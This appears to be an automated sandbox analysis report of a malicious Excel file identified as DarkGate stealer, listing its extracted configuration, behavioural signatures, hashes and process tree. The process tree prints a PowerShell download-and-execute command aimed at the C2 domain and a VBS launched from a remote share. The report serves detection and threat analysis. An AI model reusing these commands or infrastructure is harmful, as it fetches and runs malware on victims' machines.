Analysis
-
max time kernel
133s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
28-02-2024 21:20
Static task
static1
Behavioral task
behavioral1
Sample
scan-28-02-24_4761.xlsx
Resource
win10-20240221-en
General
-
Target
scan-28-02-24_4761.xlsx
-
Size
29KB
-
MD5
78d125fd15824e5ca1a3f7d99d7d8e54
-
SHA1
e905149cd68a5961ee9fb4760c29f17b3fa6b524
-
SHA256
535dd498b529c109d05d517f329897f64fd15ea57f841f4deb111262b011fc60
-
SHA512
266620784bb52ebbec6e533ca306bca8f753b311a6a76dcd3759e0614bf6f64dc124363b747fbfecc09fab3edd4da2c4e0908ae9a04a67c5438e6a0bbba63fd3
-
SSDEEP
768:wnEQpllh7tAafroiianGoHoJ+yWWn0Wht3p1:nQJh7Lro4ntD+0AZ1
Malware Config
Extracted
darkgate
admin888
cayennesxque.boo
-
anti_analysis
true
-
anti_debug
false
-
anti_vm
true
-
c2_port
80
-
check_disk
true
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_raw_stub
false
-
internal_mutex
ekoRFSqn
-
minimum_disk
50
-
minimum_ram
7000
-
ping_interval
6
-
rootkit
false
-
startup_persistence
true
-
username
admin888
Signatures
-
Detect DarkGate stealer 2 IoCs
resource yara_rule behavioral2/memory/4764-72-0x0000000005860000-0x0000000005BAF000-memory.dmp family_darkgate_v6 behavioral2/memory/4764-73-0x0000000005860000-0x0000000005BAF000-memory.dmp family_darkgate_v6 -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 708 4992 WScript.exe 27 -
Blocklisted process makes network request 4 IoCs
flow pid Process 43 3984 powershell.exe 44 3984 powershell.exe 46 3984 powershell.exe 47 3984 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
pid Process 4764 AutoIt3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AutoIt3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AutoIt3.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4992 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3984 powershell.exe 3984 powershell.exe 3984 powershell.exe 3984 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3984 powershell.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
pid Process 4992 EXCEL.EXE 4992 EXCEL.EXE 4992 EXCEL.EXE 4992 EXCEL.EXE 4992 EXCEL.EXE 4992 EXCEL.EXE 4992 EXCEL.EXE 4992 EXCEL.EXE 4992 EXCEL.EXE 4992 EXCEL.EXE 4992 EXCEL.EXE 4992 EXCEL.EXE 4992 EXCEL.EXE -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 4992 wrote to memory of 708 4992 EXCEL.EXE 98 PID 4992 wrote to memory of 708 4992 EXCEL.EXE 98 PID 708 wrote to memory of 3984 708 WScript.exe 99 PID 708 wrote to memory of 3984 708 WScript.exe 99 PID 3984 wrote to memory of 4764 3984 powershell.exe 101 PID 3984 wrote to memory of 4764 3984 powershell.exe 101 PID 3984 wrote to memory of 4764 3984 powershell.exe 101
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\scan-28-02-24_4761.xlsx"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4992 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "\\147.45.197.186\share\scan.vbs"2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'cayennesxque.boo/qdfjfvph')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3984 -
C:\temp\AutoIt3.exe"C:\temp\AutoIt3.exe" script.a3x4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:4764
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
468KB
MD55dc0a5b884e44209941ec370406fbcc5
SHA1b06cf5d11a5a7252afff61c1a787fb27ff126e28
SHA25668acdae5c94dcfc0adaa1e1965166b3d2b4b8f1f889bce4610dbd1a0b72e2bc9
SHA5120e11e3281175b0c9bdbe2474830fcd38de05e18e6edac4c1b0cd9c334ced89738c2eaf1bdf90c5e6b08c20faf96a6bdd574a472f81bc84355b69fc60832cbb53
-
Filesize
76B
MD58b428b9d5c33c6ed79386d4c10600cd8
SHA10f4bbafe0abe6cf3f3542d49a9eed5db84f9ef7e
SHA256424ef27370eb401871db935fc3fa3811179f5786fe777182550299aa8230f6b6
SHA512307e7d4228577259a4cc3874da09408e45401b46739ccaa96e0bd5a0f6aedb362dd97528aa2acc79d3698710d85c283afd0649ec412dcba8c9f8df1339e3b892